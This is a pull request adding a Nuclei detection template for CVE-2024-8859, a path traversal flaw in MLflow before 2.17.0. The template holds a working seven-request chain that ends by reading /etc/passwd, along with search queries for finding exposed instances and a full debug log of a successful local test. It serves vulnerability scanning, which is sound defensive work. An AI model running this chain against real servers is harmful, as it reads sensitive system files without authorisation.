### PR TITLE
Create CVE-2024-8859.yaml

### DIFF
--- a/http/cves/2024/CVE-2024-8859.yaml
+++ b/http/cves/2024/CVE-2024-8859.yaml
@@ -1,0 +1,102 @@
+id: CVE-2024-8859
+
+info:
+  name: Mlflow < 2.17.0 - Local File Inclusion
+  author: gy741
+  severity: critical
+  description: |
+    Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation could allow an attacker to read sensitive files on the server.
+  remediation: |
+    Upgrade Mlflow to version 2.17.0 or later to mitigate the vulnerability.
+  reference:
+    - https://huntr.com/bounties/2259b88b-a0c6-4c7c-b434-6aacf6056dcb
+    - https://github.com/mlflow/mlflow/pull/13161
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-8859
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: lfprojects
+    product: mlflow
+    shodan-query: http.title:"mlflow"
+    fofa-query:
+      - title="mlflow"
+      - app="mlflow"
+    google-query: intitle:"mlflow"
+  tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects
+
+http:
+  - raw:
+      - |
+        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{randstr}}", "artifact_location": "dbfs:/"}
+
+      - |
+        POST /ajax-api/2.0/mlflow/runs/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"experiment_id": "{{EXPERIMENT_ID}}"}
+
+      - |
+        POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
+        Host: {{Hostname}}
+
+        whatever
+
+      - |
+        POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"experiment_id": "{{EXPERIMENT_ID}}"}
+
+      - |
+        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{randstr}}"}
+
+      - |
+        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{randstr}}", "source": "dbfs:/{{RUN_ID}}/artifacts/a%3f/../../../../../../../../../../../../"}
+
+      - |
+        GET /model-versions/get-artifact?name={{randstr}}&version=1&path=etc%2Fpasswd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body_1
+        name: EXPERIMENT_ID
+        group: 1
+        json:
+          - '.experiment_id'
+        internal: true
+
+      - type: json
+        part: body_2
+        name: RUN_ID
+        group: 1
+        json:
+          - '.run.info.run_id'
+        internal: true
+

--- a/http/cves/2024/CVE-2024-8859.yaml
+++ b/http/cves/2024/CVE-2024-8859.yaml
@@ -15,15 +15,13 @@ info:
     - https://github.com/mlflow/mlflow/pull/13161
     - https://nvd.nist.gov/vuln/detail/CVE-2024-8859
   metadata:
-    verified: true
-    max-request: 3
+    max-request: 7
     vendor: lfprojects
     product: mlflow
     shodan-query: http.title:"mlflow"
     fofa-query:
       - title="mlflow"
       - app="mlflow"
-    google-query: intitle:"mlflow"
   tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects
 
 http:
@@ -36,7 +34,7 @@ http:
         {"name": "{{randstr}}", "artifact_location": "dbfs:/"}
 
       - |
-        POST /ajax-api/2.0/mlflow/runs/create HTTP/1.1
+        POST /api/2.0/mlflow/runs/create HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
@@ -70,7 +68,7 @@ http:
         {"name": "{{randstr}}", "source": "dbfs:/{{RUN_ID}}/artifacts/a%3f/../../../../../../../../../../../../"}
 
       - |
-        GET /model-versions/get-artifact?name={{randstr}}&version=1&path=etc%2Fpasswd HTTP/1.1
+        GET /model-versions/get-artifact?name={{randstr}}&version=1&path=etc/passwd HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
@@ -99,4 +97,3 @@ http:
         json:
           - '.run.info.run_id'
         internal: true
-


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2024-8859

```
Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
```

- References: https://huntr.com/bounties/2259b88b-a0c6-4c7c-b434-6aacf6056dcb

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```
root@karas:~# nuclei -t CVE-2024-8859.yaml -u http://127.0.0.1:5000 --debug

POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: close
Content-Length: 70
Content-Type: application/json
Accept-Encoding: gzip

{"name": "2pPyfMy2Vw0nGPhyPJJ34EkVVR9", "artifact_location": "dbfs:/"}
[DBG] [CVE-2024-8859] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/create

HTTP/1.1 200 OK
Connection: close
Content-Length: 43
Content-Type: application/json
Date: Wed, 27 Nov 2024 04:35:07 GMT
Server: gunicorn

{
  "experiment_id": "918918296955747843"
}
[INF] [CVE-2024-8859] Dumped HTTP request for http://127.0.0.1:5000/ajax-api/2.0/mlflow/runs/create

POST /ajax-api/2.0/mlflow/runs/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Connection: close
Content-Length: 39
Content-Type: application/json
Accept-Encoding: gzip

{"experiment_id": "918918296955747843"}
[DBG] [CVE-2024-8859] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/runs/create

HTTP/1.1 200 OK
Connection: close
Content-Length: 556
Content-Type: application/json
Date: Wed, 27 Nov 2024 04:35:07 GMT
Server: gunicorn

{
  "run": {
    "info": {
      "run_uuid": "e45152220c364b0e9f6553b00fd75341",
      "experiment_id": "918918296955747843",
      "run_name": "able-gnat-392",
      "user_id": "",
      "status": "RUNNING",
      "start_time": 0,
      "artifact_uri": "dbfs:/e45152220c364b0e9f6553b00fd75341/artifacts",
      "lifecycle_stage": "active",
      "run_id": "e45152220c364b0e9f6553b00fd75341"
    },
    "data": {
      "tags": [
        {
          "key": "mlflow.runName",
          "value": "able-gnat-392"
        }
      ]
    },
    "inputs": {}
  }
}
[INF] [CVE-2024-8859] Dumped HTTP request for http://127.0.0.1:5000/ajax-api/2.0/mlflow/upload-artifact?run_uuid=e45152220c364b0e9f6553b00fd75341&path=a?/a

POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid=e45152220c364b0e9f6553b00fd75341&path=a?/a HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.8.22
Connection: close
Content-Length: 8
Accept-Encoding: gzip

whatever
[DBG] [CVE-2024-8859] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/upload-artifact?run_uuid=e45152220c364b0e9f6553b00fd75341&path=a?/a

HTTP/1.1 200 OK
Connection: close
Content-Length: 0
Content-Type: application/json
Date: Wed, 27 Nov 2024 04:35:07 GMT
Server: gunicorn

[INF] [CVE-2024-8859] Dumped HTTP request for http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/delete

POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15
Connection: close
Content-Length: 39
Content-Type: application/json
Accept-Encoding: gzip

{"experiment_id": "918918296955747843"}
[DBG] [CVE-2024-8859] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/delete

HTTP/1.1 200 OK
Connection: close
Content-Length: 2
Content-Type: application/json
Date: Wed, 27 Nov 2024 04:35:07 GMT
Server: gunicorn

{}
[INF] [CVE-2024-8859] Dumped HTTP request for http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create

POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.20
Connection: close
Content-Length: 39
Content-Type: application/json
Accept-Encoding: gzip

{"name": "2pPyfMy2Vw0nGPhyPJJ34EkVVR9"}
[DBG] [CVE-2024-8859] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create

HTTP/1.1 200 OK
Connection: close
Content-Length: 159
Content-Type: application/json
Date: Wed, 27 Nov 2024 04:35:07 GMT
Server: gunicorn

{
  "registered_model": {
    "name": "2pPyfMy2Vw0nGPhyPJJ34EkVVR9",
    "creation_timestamp": 1732682107212,
    "last_updated_timestamp": 1732682107212
  }
}
[INF] [CVE-2024-8859] Dumped HTTP request for http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create

POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.17
Connection: close
Content-Length: 143
Content-Type: application/json
Accept-Encoding: gzip

{"name": "2pPyfMy2Vw0nGPhyPJJ34EkVVR9", "source": "dbfs:/e45152220c364b0e9f6553b00fd75341/artifacts/a%3f/../../../../../../../../../../../../"}
[DBG] [CVE-2024-8859] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create

HTTP/1.1 200 OK
Connection: close
Content-Length: 397
Content-Type: application/json
Date: Wed, 27 Nov 2024 04:35:07 GMT
Server: gunicorn

{
  "model_version": {
    "name": "2pPyfMy2Vw0nGPhyPJJ34EkVVR9",
    "version": "1",
    "creation_timestamp": 1732682107225,
    "last_updated_timestamp": 1732682107225,
    "current_stage": "None",
    "description": "",
    "source": "dbfs:/e45152220c364b0e9f6553b00fd75341/artifacts/a%3f/../../../../../../../../../../../../",
    "run_id": "",
    "status": "READY",
    "run_link": ""
  }
}
[INF] [CVE-2024-8859] Dumped HTTP request for http://127.0.0.1:5000/model-versions/get-artifact?name=2pPyfMy2Vw0nGPhyPJJ34EkVVR9&version=1&path=etc%2Fpasswd

GET /model-versions/get-artifact?name=2pPyfMy2Vw0nGPhyPJJ34EkVVR9&version=1&path=etc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (SS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2024-8859] Dumped HTTP response http://127.0.0.1:5000/model-versions/get-artifact?name=2pPyfMy2Vw0nGPhyPJJ34EkVVR9&version=1&path=etc%2Fpasswd

HTTP/1.1 200 OK
Connection: close
Content-Length: 1667
Cache-Control: no-cache
Content-Disposition: attachment; filename=passwd
Content-Type: application/octet-stream
Date: Wed, 27 Nov 2024 04:35:07 GMT
Etag: "1720600661.8868458-1667-393413677"
Last-Modified: Wed, 10 Jul 2024 08:37:41 GMT
Server: gunicorn
X-Content-Type-Options: nosniff


00000000  72 6f 6f 74 3a 78 3a 30  3a 30 3a 72 6f 6f 74 3a  |root:x:0:0:root:|
.....
.....
00000680  69 6e 0a                                          |in.|
[CVE-2024-8859:regex-1] [http] [critical] http://127.0.0.1:5000/model-versions/get-artifact?name=2pPyfMy2Vw0nGPhyPJJ34EkVVR9&version=1&path=etc%2Fpasswd
[CVE-2024-8859:status-2] [http] [critical] http://127.0.0.1:5000/model-versions/get-artifact?name=2pPyfMy2Vw0nGPhyPJJ34EkVVR9&version=1&path=etc%2Fpasswd
```
